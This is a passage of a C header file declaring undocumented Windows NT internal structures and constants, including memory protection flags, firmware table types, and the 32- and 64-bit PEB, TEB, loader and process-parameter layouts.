MM_READONLY 1\n#define MM_EXECUTE 2\n#define MM_EXECUTE_READ 3\n#define MM_READWRITE 4 // bit 2 is set if this is writable.\n#define MM_WRITECOPY 5\n#define MM_EXECUTE_READWRITE 6\n#define MM_EXECUTE_WRITECOPY 7\n\n#define MM_NOCACHE 0x8\n#define MM_GUARD_PAGE 0x10\n#define MM_DECOMMIT 0x10 // NO_ACCESS, Guard page\n#define MM_NOACCESS 0x18 // NO_ACCESS, Guard_page, nocache.\n#define MM_UNKNOWN_PROTECTION 0x100 // bigger than 5 bits!\n\n#define MM_INVALID_PROTECTION ((ULONG)-1) // bigger than 5 bits!\n\n#define MM_PROTECTION_WRITE_MASK 4\n#define MM_PROTECTION_COPY_MASK 1\n#define MM_PROTECTION_OPERATION_MASK 7 // mask off guard page and nocache.\n#define MM_PROTECTION_EXECUTE_MASK 2\n\n#define MM_SECURE_DELETE_CHECK 0x55\n\n/*\n** Virtual Memory END\n*/\n\n/*\n** System Firmware START\n*/\n\ntypedef enum _SYSTEM_FIRMWARE_TABLE_ACTION {\n SystemFirmwareTable_Enumerate,\n SystemFirmwareTable_Get,\n SystemFirmwareTableMax\n} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;\n\ntypedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {\n ULONG ProviderSignature;\n SYSTEM_FIRMWARE_TABLE_ACTION Action;\n ULONG TableID;\n ULONG TableBufferLength;\n UCHAR TableBuffer[ANYSIZE_ARRAY];\n} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;\n\n/*\n** System Firmware END\n*/\n\n//\n// PEB/TEB\n//\n#define GDI_HANDLE_BUFFER_SIZE32 34\n#define GDI_HANDLE_BUFFER_SIZE64 60\n\n#if !defined(_M_X64)\n#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32\n#else\n#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64\n#endif\n\ntypedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];\ntypedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];\ntypedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];\n\n#define RTL_MAX_DRIVE_LETTERS 32\n#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001\n\n// 32-bit definitions\ntypedef struct _STRING32 {\n USHORT Length;\n USHORT MaximumLength;\n ULONG Buffer;\n} STRING32;\ntypedef STRING32 *PSTRING32;\n\ntypedef STRING32 UNICODE_STRING32;\n\n#if (_MSC_VER < 1300) && !defined(_WINDOWS_)\ntypedef struct LIST_ENTRY32 {\n DWORD Flink;\n DWORD Blink;\n} LIST_ENTRY32;\ntypedef LIST_ENTRY32 *PLIST_ENTRY32;\n\ntypedef struct LIST_ENTRY64 {\n ULONGLONG Flink;\n ULONGLONG Blink;\n} LIST_ENTRY64;\ntypedef LIST_ENTRY64 *PLIST_ENTRY64;\n#endif\n\n#define WOW64_POINTER(Type) ULONG\n\ntypedef struct _PEB_LDR_DATA32 {\n ULONG Length;\n BOOLEAN Initialized;\n WOW64_POINTER(HANDLE) SsHandle;\n LIST_ENTRY32 InLoadOrderModuleList;\n LIST_ENTRY32 InMemoryOrderModuleList;\n LIST_ENTRY32 InInitializationOrderModuleList;\n WOW64_POINTER(PVOID) EntryInProgress;\n BOOLEAN ShutdownInProgress;\n WOW64_POINTER(HANDLE) ShutdownThreadId;\n} PEB_LDR_DATA32, *PPEB_LDR_DATA32;\n\n#define LDR_DATA_TABLE_ENTRY_SIZE_WINXP32 FIELD_OFFSET( LDR_DATA_TABLE_ENTRY32, ForwarderLinks )\n\ntypedef struct _LDR_DATA_TABLE_ENTRY32 {\n LIST_ENTRY32 InLoadOrderLinks;\n LIST_ENTRY32 InMemoryOrderLinks;\n LIST_ENTRY32 InInitializationOrderLinks;\n WOW64_POINTER(PVOID) DllBase;\n WOW64_POINTER(PVOID) EntryPoint;\n ULONG SizeOfImage;\n UNICODE_STRING32 FullDllName;\n UNICODE_STRING32 BaseDllName;\n ULONG Flags;\n USHORT LoadCount;\n USHORT TlsIndex;\n union\n {\n LIST_ENTRY32 HashLinks;\n struct\n {\n WOW64_POINTER(PVOID) SectionPointer;\n ULONG CheckSum;\n };\n };\n union\n {\n ULONG TimeDateStamp;\n WOW64_POINTER(PVOID) LoadedImports;\n };\n WOW64_POINTER(PVOID) EntryPointActivationContext;\n WOW64_POINTER(PVOID) PatchInformation;\n LIST_ENTRY32 ForwarderLinks;\n LIST_ENTRY32 ServiceTagLinks;\n LIST_ENTRY32 StaticLinks;\n WOW64_POINTER(PVOID) ContextInformation;\n WOW64_POINTER(ULONG_PTR) OriginalBase;\n LARGE_INTEGER LoadTime;\n} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;\n\ntypedef struct _CURDIR32 {\n UNICODE_STRING32 DosPath;\n WOW64_POINTER(HANDLE) Handle;\n} CURDIR32, *PCURDIR32;\n\ntypedef struct _RTL_DRIVE_LETTER_CURDIR32 {\n USHORT Flags;\n USHORT Length;\n ULONG TimeStamp;\n STRING32 DosPath;\n} RTL_DRIVE_LETTER_CURDIR32, *PRTL_DRIVE_LETTER_CURDIR32;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS32 {\n ULONG MaximumLength;\n ULONG Length;\n\n ULONG Flags;\n ULONG DebugFlags;\n\n WOW64_POINTER(HANDLE) ConsoleHandle;\n ULONG ConsoleFlags;\n WOW64_POINTER(HANDLE) StandardInput;\n WOW64_POINTER(HANDLE) StandardOutput;\n WOW64_POINTER(HANDLE) StandardError;\n\n CURDIR32 CurrentDirectory;\n UNICODE_STRING32 DllPath;\n UNICODE_STRING32 ImagePathName;\n UNICODE_STRING32 CommandLine;\n WOW64_POINTER(PVOID) Environment;\n\n ULONG StartingX;\n ULONG StartingY;\n ULONG CountX;\n ULONG CountY;\n ULONG CountCharsX;\n ULONG CountCharsY;\n ULONG FillAttribute;\n\n ULONG WindowFlags;\n ULONG ShowWindowFlags;\n UNICODE_STRING32 WindowTitle;\n UNICODE_STRING32 DesktopInfo;\n UNICODE_STRING32 ShellInfo;\n UNICODE_STRING32 RuntimeData;\n RTL_DRIVE_LETTER_CURDIR32 CurrentDirectories[RTL_MAX_DRIVE_LETTERS];\n\n ULONG EnvironmentSize;\n ULONG EnvironmentVersion;\n} RTL_USER_PROCESS_PARAMETERS32, *PRTL_USER_PROCESS_PARAMETERS32;\n\ntypedef struct _PEB32 {\n BOOLEAN InheritedAddressSpace;\n BOOLEAN ReadImageFileExecOptions;\n BOOLEAN BeingDebugged;\n union\n {\n BOOLEAN BitField;\n struct\n {\n BOOLEAN ImageUsesLargePages : 1;\n BOOLEAN IsProtectedProcess : 1;\n BOOLEAN IsLegacyProcess : 1;\n BOOLEAN IsImageDynamicallyRelocated : 1;\n BOOLEAN SkipPatchingUser32Forwarders : 1;\n BOOLEAN SpareBits : 3;\n };\n };\n WOW64_POINTER(HANDLE) Mutant;\n\n WOW64_POINTER(PVOID) ImageBaseAddress;\n WOW64_POINTER(PPEB_LDR_DATA) Ldr;\n WOW64_POINTER(PRTL_USER_PROCESS_PARAMETERS) ProcessParameters;\n WOW64_POINTER(PVOID) SubSystemData;\n WOW64_POINTER(PVOID) ProcessHeap;\n WOW64_POINTER(PRTL_CRITICAL_SECTION) FastPebLock;\n WOW64_POINTER(PVOID) AtlThunkSListPtr;\n WOW64_POINTER(PVOID) IFEOKey;\n union\n {\n ULONG CrossProcessFlags;\n struct\n {\n ULONG ProcessInJob : 1;\n ULONG ProcessInitializing : 1;\n ULONG ProcessUsingVEH : 1;\n ULONG ProcessUsingVCH : 1;\n ULONG ProcessUsingFTH : 1;\n ULONG ProcessPreviouslyThrottled : 1;\n ULONG ProcessCurrentlyThrottled : 1;\n ULONG ReservedBits0 : 25;\n };\n ULONG EnvironmentUpdateCount;\n };\n union\n {\n WOW64_POINTER(PVOID) KernelCallbackTable;\n WOW64_POINTER(PVOID) UserSharedInfoPtr;\n };\n ULONG SystemReserved[1];\n ULONG AtlThunkSListPtr32;\n WOW64_POINTER(PVOID) ApiSetMap;\n ULONG TlsExpansionCounter;\n WOW64_POINTER(PVOID) TlsBitmap;\n ULONG TlsBitmapBits[2];\n WOW64_POINTER(PVOID) ReadOnlySharedMemoryBase;\n WOW64_POINTER(PVOID) HotpatchInformation;\n WOW64_POINTER(PPVOID) ReadOnlyStaticServerData;\n WOW64_POINTER(PVOID) AnsiCodePageData;\n WOW64_POINTER(PVOID) OemCodePageData;\n WOW64_POINTER(PVOID) UnicodeCaseTableData;\n\n ULONG NumberOfProcessors;\n ULONG NtGlobalFlag;\n\n LARGE_INTEGER CriticalSectionTimeout;\n WOW64_POINTER(SIZE_T) HeapSegmentReserve;\n WOW64_POINTER(SIZE_T) HeapSegmentCommit;\n WOW64_POINTER(SIZE_T) HeapDeCommitTotalFreeThreshold;\n WOW64_POINTER(SIZE_T) HeapDeCommitFreeBlockThreshold;\n\n ULONG NumberOfHeaps;\n ULONG MaximumNumberOfHeaps;\n WOW64_POINTER(PPVOID) ProcessHeaps;\n\n WOW64_POINTER(PVOID) GdiSharedHandleTable;\n WOW64_POINTER(PVOID) ProcessStarterHelper;\n ULONG GdiDCAttributeList;\n\n WOW64_POINTER(PRTL_CRITICAL_SECTION) LoaderLock;\n\n ULONG OSMajorVersion;\n ULONG OSMinorVersion;\n USHORT OSBuildNumber;\n USHORT OSCSDVersion;\n ULONG OSPlatformId;\n ULONG ImageSubsystem;\n ULONG ImageSubsystemMajorVersion;\n ULONG ImageSubsystemMinorVersion;\n WOW64_POINTER(ULONG_PTR) ImageProcessAffinityMask;\n GDI_HANDLE_BUFFER32 GdiHandleBuffer;\n WOW64_POINTER(PVOID) PostProcessInitRoutine;\n\n WOW64_POINTER(PVOID) TlsExpansionBitmap;\n ULONG TlsExpansionBitmapBits[32];\n\n ULONG SessionId;\n\n // Rest of structure not included.\n} PEB32, *PPEB32;\n\n#define GDI_BATCH_BUFFER_SIZE 310\n\ntypedef struct _GDI_TEB_BATCH32 {\n ULONG Offset;\n WOW64_POINTER(ULONG_PTR) HDC;\n ULONG Buffer[GDI_BATCH_BUFFER_SIZE];\n} GDI_TEB_BATCH32, *PGDI_TEB_BATCH32;\n\n#if (_MSC_VER < 1300) && !defined(_WINDOWS_)\n//\n// 32 and 64 bit specific version for wow64 and the debugger\n//\ntypedef struct _NT_TIB32 {\n DWORD ExceptionList;\n DWORD StackBase;\n DWORD StackLimit;\n DWORD SubSystemTib;\n union {\n DWORD FiberData;\n DWORD Version;\n };\n DWORD ArbitraryUserPointer;\n DWORD Self;\n} NT_TIB32, *PNT_TIB32;\n\ntypedef struct _NT_TIB64 {\n DWORD64 ExceptionList;\n DWORD64 StackBase;\n DWORD64 StackLimit;\n DWORD64 SubSystemTib;\n union {\n DWORD64 FiberData;\n DWORD Version;\n };\n DWORD64 ArbitraryUserPointer;\n DWORD64 Self;\n} NT_TIB64, *PNT_TIB64;\n#endif\n\ntypedef struct _TEB32 {\n NT_TIB32 NtTib;\n\n WOW64_POINTER(PVOID) EnvironmentPointer;\n CLIENT_ID32 ClientId;\n WOW64_POINTER(PVOID) ActiveRpcHandle;\n WOW64_POINTER(PVOID) ThreadLocalStoragePointer;\n WOW64_POINTER(PPEB) ProcessEnvironmentBlock;\n\n ULONG LastErrorValue;\n ULONG CountOfOwnedCriticalSections;\n WOW64_POINTER(PVOID) CsrClientThread;\n WOW64_POINTER(PVOID) Win32ThreadInfo;\n ULONG User32Reserved[26];\n ULONG UserReserved[5];\n WOW64_POINTER(PVOID) WOW32Reserved;\n LCID CurrentLocale;\n ULONG FpSoftwareStatusRegister;\n WOW64_POINTER(PVOID) SystemReserved1[54];\n NTSTATUS ExceptionCode;\n WOW64_POINTER(PVOID) ActivationContextStackPointer;\n BYTE SpareBytes[36];\n ULONG TxFsContext;\n\n GDI_TEB_BATCH32 GdiTebBatch;\n CLIENT_ID32 RealClientId;\n WOW64_POINTER(HANDLE) GdiCachedProcessHandle;\n ULONG GdiClientPID;\n ULONG GdiClientTID;\n WOW64_POINTER(PVOID) GdiThreadLocalInfo;\n WOW64_POINTER(ULONG_PTR) Win32ClientInfo[62];\n WOW64_POINTER(PVOID) glDispatchTable[233];\n WOW64_POINTER(ULONG_PTR) glReserved1[29];\n WOW64_POINTER(PVOID) glReserved2;\n WOW64_POINTER(PVOID) glSectionInfo;\n WOW64_POINTER(PVOID) glSection;\n WOW64_POINTER(PVOID) glTable;\n WOW64_POINTER(PVOID) glCurrentRC;\n WOW64_POINTER(PVOID) glContext;\n\n NTSTATUS LastStatusValue;\n UNICODE_STRING32 StaticUnicodeString;\n WCHAR StaticUnicodeBuffer[261];\n\n WOW64_POINTER(PVOID) DeallocationStack;\n WOW64_POINTER(PVOID) TlsSlots[64];\n LIST_ENTRY32 TlsLinks;\n} TEB32, *PTEB32;\n\ntypedef struct _PEB_LDR_DATA {\n ULONG Length;\n BOOLEAN Initialized;\n HANDLE SsHandle;\n LIST_ENTRY InLoadOrderModuleList;\n LIST_ENTRY InMemoryOrderModuleList;\n LIST_ENTRY InInitializationOrderModuleList;\n PVOID EntryInProgress;\n BOOLEAN ShutdownInProgress;\n HANDLE ShutdownThreadId;\n} PEB_LDR_DATA, *PPEB_LDR_DATA;\n\n#ifndef FLS_MAXIMUM_AVAILABLE\n#define FLS_MAXIMUM_AVAILABLE 128\n#endif\n\n#ifndef TLS_MINIMUM_AVAILABLE\n#define TLS_MINIMUM_AVAILABLE 64\n#endif\n\n#ifndef TLS_EXPANSION_SLOTS\n#define TLS_EXPANSION_SLOTS 1024\n#endif\n\n#ifndef DOS_MAX_COMPONENT_LENGTH\n#define DOS_MAX_COMPONENT_LENGTH 255\n#endif\n\n#ifndef DOS_MAX_PATH_LENGTH\n#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)\n#endif\n\ntypedef struct _ACTIVATION_CONTEXT_DATA * PACTIVATION_CONTEXT_DATA;\ntypedef struct _ASSEMBLY_STORAGE_MAP * PASSEMBLY_STORAGE_MAP;\n\ntypedef struct _CURDIR {\n UNICODE_STRING DosPath;\n HANDLE Handle;\n} CURDIR, *PCURDIR;\n\n#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002\n#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003\n\ntypedef struct _RTL_DRIVE_LETTER_CURDIR {\n USHORT Flags;\n USHORT Length;\n ULONG TimeStamp;\n STRING DosPath;\n} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS {\n ULONG MaximumLength;\n ULONG Length;\n\n ULONG Flags;\n ULONG DebugFlags;\n\n HANDLE ConsoleHandle;\n ULONG ConsoleFlags;\n HANDLE StandardInput;\n HANDLE StandardOutput;\n HANDLE StandardError;\n\n CURDIR CurrentDirectory;\n UNICODE_STRING DllPath;\n UNICODE_STRING ImagePathName;\n UNICODE_STRING CommandLine;\n PVOID Environment;\n\n ULONG StartingX;\n ULONG StartingY;\n ULONG CountX;\n ULONG CountY;\n ULONG CountCharsX;\n ULONG CountCharsY;\n ULONG FillAttribute;\n\n ULONG WindowFlags;\n ULONG ShowWindowFlags;\n UNICODE_STRING WindowTitle;\n UNICODE_STRING DesktopInfo;\n UNICODE_STRING ShellInfo;\n UNICODE_STRING RuntimeData;\n RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];\n\n ULONG_PTR EnvironmentSize;\n ULONG_PTR EnvironmentVersion;\n\n PVOID PackageDependencyData;\n ULONG ProcessGroupId;\n ULONG LoaderThreads;\n\n UNICODE_STRING RedirectionDllName; // RS4\n UNICODE_STRING HeapPartitionName; // 19H1\n ULONG_PTR DefaultThreadpoolCpuSetMasks;\n ULONG DefaultThreadpoolCpuSetMaskCount;\n ULONG DefaultThreadpoolThreadMaximum;\n ULONG HeapMemoryTypeMask; // WIN11\n} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;\n\n#define FLG_STOP_ON_EXCEPTION 0x00000001\n#define FLG_SHOW_LDR_SNAPS 0x00000002 \n#define FLG_DEBUG_INITIAL_COMMAND 0x00000004 \n#define FLG_STOP_ON_HUNG_GUI 0x00000008 \n#define FLG_HEAP_ENABLE_TAIL_CHECK 0x00000010\n#define FLG_HEAP_ENABLE_FREE_CHECK 0x00000020\n#define FLG_HEAP_VALIDATE_PARAMETERS 0x00000040\n#define FLG_HEAP_VALIDATE_ALL 0x00000080\n#define FLG_APPLICATION_VERIFIER 0x00000100\n#define FLG_MONITOR_SILENT_PROCESS_EXIT 0x00000200\n#define FLG_POOL_ENABLE_TAGGING 0x00000400\n#define FLG_HEAP_ENABLE_TAGGING 0x00000800\n#define FLG_USER_STACK_TRACE_DB 0x00001000 \n#define FLG_KERNEL_STACK_TRACE_DB 0x00002000\n#define FLG_MAINTAIN_OBJECT_TYPELIST 0x00004000\n#define FLG_HEAP_ENABLE_TAG_BY_DLL 0x00008000\n#define FLG_DISABLE_STACK_EXTENSION 0x00010000 \n#define FLG_ENABLE_CSRDEBUG 0x00020000\n#define FLG_ENABLE_KDEBUG_SYMBOL_LOAD 0x00040000 \n#define FLG_DISABLE_PAGE_KERNEL_STACKS 0x00080000\n#define FLG_ENABLE_SYSTEM_CRIT_BREAKS 0x00100000\n#define FLG_HEAP_DISABLE_COALESCING 0x00200000 \n#define FLG_ENABLE_CLOSE_EXCEPTIONS 0x00400000 \n#define FLG_ENABLE_EXCEPTION_LOGGING 0x00800000\n#define FLG_ENABLE_HANDLE_TYPE_TAGGING 0x01000000 \n#define FLG_HEAP_PAGE_ALLOCS 0x02000000\n#define FLG_DEBUG_INITIAL_COMMAND_EX 0x04000000 \n#define FLG_DISABLE_DBGPRINT 0x08000000\n#define FLG_CRITSEC_EVENT_CREATION 0x10000000 \n#define FLG_LDR_TOP_DOWN 0x20000000 \n#define FLG_ENABLE_HANDLE_EXCEPTIONS 0x40000000\n#define FLG_DISABLE_PROTDLLS 0x80000000\n\ntypedef struct _PEB {\n BOOLEAN InheritedAddressSpace;\n BOOLEAN ReadImageFileExecOptions;\n BOOLEAN BeingDebugged;\n union\n {\n BOOLEAN BitField;\n struct\n {\n BOOLEAN ImageUsesLargePages : 1;\n BOOLEAN IsProtectedProcess : 1;\n BOOLEAN IsImageDynamicallyRelocated : 1;\n BOOLEAN SkipPatchingUser32Forwarders : 1;\n BOOLEAN IsPackagedProcess : 1;\n BOOLEAN IsAppContainer : 1;\n BOOLEAN IsProtectedProcessLight : 1;\n BOOLEAN IsLongPathAwareProcess : 1;\n };\n };\n\n HANDLE Mutant;\n\n PVOID ImageBaseAddress;\n PPEB_LDR_DATA Ldr;\n PRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n PVOID SubSystemData;\n PVOID ProcessHeap;\n PRTL_CRITICAL_SECTION FastPebLock;\n PSLIST_HEADER AtlThunkSListPtr;\n PVOID IFEOKey;\n\n union\n {\n ULONG CrossProcessFlags;\n struct\n {\n ULONG ProcessInJob : 1;\n ULONG ProcessInitializing : 1;\n ULONG ProcessUsingVEH : 1;\n ULONG ProcessUsingVCH : 1;\n ULONG ProcessUsingFTH : 1;\n ULONG ProcessPreviouslyThrottled : 1;\n ULONG ProcessCurrentlyThrottled : 1;\n ULONG ProcessImagesHotPatched : 1; // RS5\n ULONG ReservedBits0 : 24;\n };\n };\n union\n {\n PVOID KernelCallbackTable;\n PVOID UserSharedInfoPtr;\n };\n ULONG SystemReserved;\n ULONG AtlThunkSListPtr32;\n PVOID ApiSetMap;\n ULONG TlsExpansionCounter;\n PVOID TlsBitmap;\n ULONG TlsBitmapBits[2];\n\n PVOID ReadOnlySharedMemoryBase;\n struct _SILO_USER_SHARED_DATA* SharedData;\n PVOID* ReadOnlyStaticServerData;\n\n PVOID AnsiCodePageData;\n PVOID OemCodePageData;\n PVOID UnicodeCaseTableData;\n\n ULONG NumberOfProcessors;\n union\n {\n ULONG NtGlobalFlag;\n struct\n {\n ULONG StopOnException : 1; // FLG_STOP_ON_EXCEPTION\n ULONG ShowLoaderSnaps : 1; // FLG_SHOW_LDR_SNAPS\n ULONG DebugInitialCommand : 1; // FLG_DEBUG_INITIAL_COMMAND\n ULONG StopOnHungGUI : 1; // FLG_STOP_ON_HUNG_GUI\n ULONG HeapEnableTailCheck : 1; // FLG_HEAP_ENABLE_TAIL_CHECK\n ULONG HeapEnableFreeCheck : 1; // FLG_HEAP_ENABLE_FREE_CHECK\n ULONG HeapValidateParameters : 1; // FLG_HEAP_VALIDATE_PARAMETERS\n ULONG HeapValidateAll : 1; // FLG_HEAP_VALIDATE_ALL\n ULONG ApplicationVerifier : 1; // FLG_APPLICATION_VERIFIER\n ULONG MonitorSilentProcessExit : 1; // FLG_MONITOR_SILENT_PROCESS_EXIT\n ULONG PoolEnableTagging : 1; // FLG_POOL_ENABLE_TAGGING\n ULONG HeapEnableTagging : 1; // FLG_HEAP_ENABLE_TAGGING\n ULONG UserStackTraceDb : 1; // FLG_USER_STACK_TRACE_DB\n ULONG KernelStackTraceDb : 1; // FLG_KERNEL_STACK_TRACE_DB\n ULONG MaintainObjectTypeList : 1; // FLG_MAINTAIN_OBJECT_TYPELIST\n ULONG HeapEnableTagByDll : 1; // FLG_HEAP_ENABLE_TAG_BY_DLL\n ULONG DisableStackExtension : 1; // FLG_DISABLE_STACK_EXTENSION\n ULONG EnableCsrDebug : 1; // FLG_ENABLE_CSRDEBUG\n ULONG EnableKDebugSymbolLoad : 1; // FLG_ENABLE_KDEBUG_SYMBOL_LOAD\n ULONG DisablePageKernelStacks : 1; // FLG_DISABLE_PAGE_KERNEL_STACKS\n ULONG EnableSystemCritBreaks : 1; // FLG_ENABLE_SYSTEM_CRIT_BREAKS\n ULONG HeapDisableCoalescing : 1; // FLG_HEAP_DISABLE_COALESCING\n ULONG EnableCloseExceptions : 1; // FLG_ENABLE_CLOSE_EXCEPTIONS\n ULONG EnableExceptionLogging : 1; // FLG_ENABLE_EXCEPTION_LOGGING\n ULONG EnableHandleTypeTagging : 1; // FLG_ENABLE_HANDLE_TYPE_TAGGING\n ULONG HeapPageAllocs : 1; // FLG_HEAP_PAGE_ALLOCS\n ULONG DebugInitialCommandEx : 1; // FLG_DEBUG_INITIAL_COMMAND_EX\n ULONG DisableDbgPrint : 1; // FLG_DISABLE_DBGPRINT\n ULONG CritSecEventCreation : 1; // FLG_CRITSEC_EVENT_CREATION\n ULONG LdrTopDown : 1; // FLG_LDR_TOP_DOWN\n ULONG EnableHandleExceptions : 1; // FLG_ENABLE_HANDLE_EXCEPTIONS\n ULONG DisableProtDlls : 1; // FLG_DISABLE_PROTDLLS\n } NtGlobalFlags;\n };\n\n ULARGE_INTEGER CriticalSectionTimeout;\n SIZE_T HeapSegmentReserve;\n SIZE_T HeapSegmentCommit;\n SIZE_T HeapDeCommitTotalFreeThreshold;\n SIZE_T HeapDeCommitFreeBlockThreshold;\n\n ULONG NumberOfHeaps;\n ULONG MaximumNumberOfHeaps;\n PVOID* ProcessHeaps;\n\n PVOID GdiSharedHandleTable;\n PVOID ProcessStarterHelper;\n ULONG GdiDCAttributeList;\n\n PRTL_CRITICAL_SECTION LoaderLock;\n\n ULONG OSMajorVersion;\n ULONG OSMinorVersion;\n USHORT OSBuildNumber;\n USHORT OSCSDVersion;\n ULONG OSPlatformId;\n ULONG ImageSubsystem;\n ULONG ImageSubsystemMajorVersion;\n ULONG ImageSubsystemMinorVersion;\n KAFFINITY ActiveProcessAffinityMask;\n GDI_HANDLE_BUFFER GdiHandleBuffer;\n PVOID PostProcessInitRoutine;\n\n PVOID TlsExpansionBitmap;\n ULONG TlsExpansionBitmapBits[32];\n\n ULONG SessionId;\n\n ULARGE_INTEGER AppCompatFlags;\n ULARGE_INTEGER AppCompatFlagsUser;\n PVOID pShimData;\n PVOID AppCompatInfo;\n\n UNICODE_STRING CSDVersion;\n\n PACTIVATION_CONTEXT_DATA ActivationContextData;\n PASSEMBLY_STORAGE_MAP ProcessAssemblyStorageMap;\n PACTIVATION_CONTEXT_DATA SystemDefaultActivationContextData;\n PASSEMBLY_STORAGE_MAP SystemAssemblyStorageMap;\n\n SIZE_T MinimumStackCommit;\n\n PVOID SparePointers[2];\n PVOID PatchLoaderData;\n PVOID ChpeV2ProcessInfo; \n\n ULONG AppModelFeatureState;\n ULONG SpareUlongs[2];\n\n USHORT ActiveCodePage;\n USHORT OemCodePage;\n USHORT UseCaseMapping;\n USHORT UnusedNlsField;\n\n PVOID WerRegistrationData;\n PVOID WerShipAssertPtr;\n\n union\n {\n PVOID pContextData;\n PVOID pUnused;\n PVOID EcCodeBitMap;\n };\n\n PVOID pImageHeaderHash;\n union\n {\n ULONG TracingFlags;\n struct\n {\n ULONG HeapTracingEnabled : 1;\n ULONG CritSecTracingEnabled : 1;\n ULONG LibLoaderTracingEnabled : 1;\n ULONG SpareTracingBits : 29;\n };\n };\n ULONGLONG CsrServerReadOnlySharedMemoryBase;\n PRTL_CRITICAL_SECTION TppWorkerpListLock;\n LIST_ENTRY TppWorkerpList;\n PVOID WaitOnAddressHashTable[128];\n PVOID TelemetryCoverageHeader; // RS3\n ULONG CloudFileFlags;\n ULONG CloudFileDiagFlags; // RS4\n CHAR PlaceholderCompatibilityMode;\n CHAR PlaceholderCompatibilityModeReserved[7];\n struct _LEAP_SECOND_DATA* LeapSecondData; // RS5\n union\n {\n ULONG LeapSecondFlags;\n struct\n {\n ULONG SixtySecondEnabled : 1;\n ULONG Reserved : 31;\n };\n };\n ULONG NtGlobalFlag2;\n ULONGLONG ExtendedFeatureDisableMask; // since WIN11\n} PEB, * PPEB;\n\ntypedef struct _TEB_ACTIVE_FRAME_CONTEXT {\n ULONG Flags;\n PCSTR FrameName;\n} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;\n\ntypedef struct _TEB_ACTIVE_FRAME {\n ULONG Flags;\n struct _TEB_ACTIVE_FRAME *Previous;\n PTEB_ACTIVE_FRAME_CONTEXT Context;\n} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;\n\n#define GDI_BATCH_BUFFER_SIZE 310\n\ntypedef struct _GDI_TEB_BATCH {\n ULONG\tOffset;\n UCHAR\tAlignment[4];\n ULONG_PTR HDC;\n ULONG\tBuffer[GDI_BATCH_BUFFER_SIZE];\n} GDI_TEB_BATCH, *PGDI_TEB_BATCH;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA {\n ULONG Magic; //'xtcA'\n ULONG HeaderSize;\n ULONG FormatVersion;\n ULONG TotalSize;\n ULONG DefaultTocOffset;\n ULONG ExtendedTocOffset;\n ULONG AssemblyRosterOffset; \n ULONG Flags;\n} ACTIVATION_CONTEXT_DATA, * PACTIVATION_CONTEXT_DATA;\n\ntypedef struct _ASSEMBLY_STORAGE_MAP_ENTRY {\n ULONG Flags;\n UNICODE_STRING DosPath;\n HANDLE Handle;\n} ASSEMBLY_STORAGE_MAP_ENTRY, * PASSEMBLY_STORAGE_MAP_ENTRY;\n\ntypedef struct _ASSEMBLY_STORAGE_MAP {\n ULONG Flags;\n ULONG AssemblyCount;\n PASSEMBLY_STORAGE_MAP_ENTRY* AssemblyArray;\n} ASSEMBLY_STORAGE_MAP, * PASSEMBLY_STORAGE_MAP;\n\ntypedef VOID(NTAPI* PACTIVATION_CONTEXT_NOTIFY_ROUTINE)(\n _In_ ULONG NotificationType,\n _In_ struct _ACTIVATION_CONTEXT* ActivationContext,\n _In_ PACTIVATION_CONTEXT_DATA ActivationContextData,\n _In_opt_ PVOID NotificationContext,\n _In_opt_ PVOID NotificationData,\n _Inout_ PBOOLEAN DisableThisNotification\n );\n\ntypedef struct _ACTIVATION_CONTEXT {\n ULONG RefCount;\n ULONG Flags;\n LIST_ENTRY Links;\n ACTIVATION_CONTEXT_DATA* ActivationContextData;\n PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine;\n PVOID NotificationContext;\n ULONG SendNotifications[4];\n ULONG DisabledNotifications[4];\n ASSEMBLY_STORAGE_MAP StorageMap;\n ASSEMBLY_STORAGE_MAP_ENTRY* InlineStorageMapEntries;\n ULONG StackTraceIndex;\n PVOID StackTraces[4][4];\n} ACTIVATION_CONTEXT, * PACTIVATION_CONTEXT;\n\ntypedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {\n struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;\n PACTIVATION_CONTEXT ActivationContext;\n ULONG Flags;\n} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;\n\ntypedef struct _ACTIVATION_CONTEXT_STACK {\n PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;\n LIST_ENTRY FrameListCache;\n ULONG Flags;\n ULONG NextCookieSequenceNumber;\n ULONG StackId;\n} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;\n\ntypedef struct _TEB {\n NT_TIB NtTib;\n\n PVOID EnvironmentPointer;\n CLIENT_ID ClientId;\n PVOID ActiveRpcHandle;\n PVOID ThreadLocalStoragePointer;\n PPEB ProcessEnvironmentBlock;\n\n ULONG LastErrorValue;\n ULONG CountOfOwnedCriticalSections;\n PVOID CsrClientThread;\n PVOID Win32ThreadInfo;\n ULONG User32Reserved[26];\n ULONG UserReserved[5];\n PVOID WOW32Reserved;\n LCID 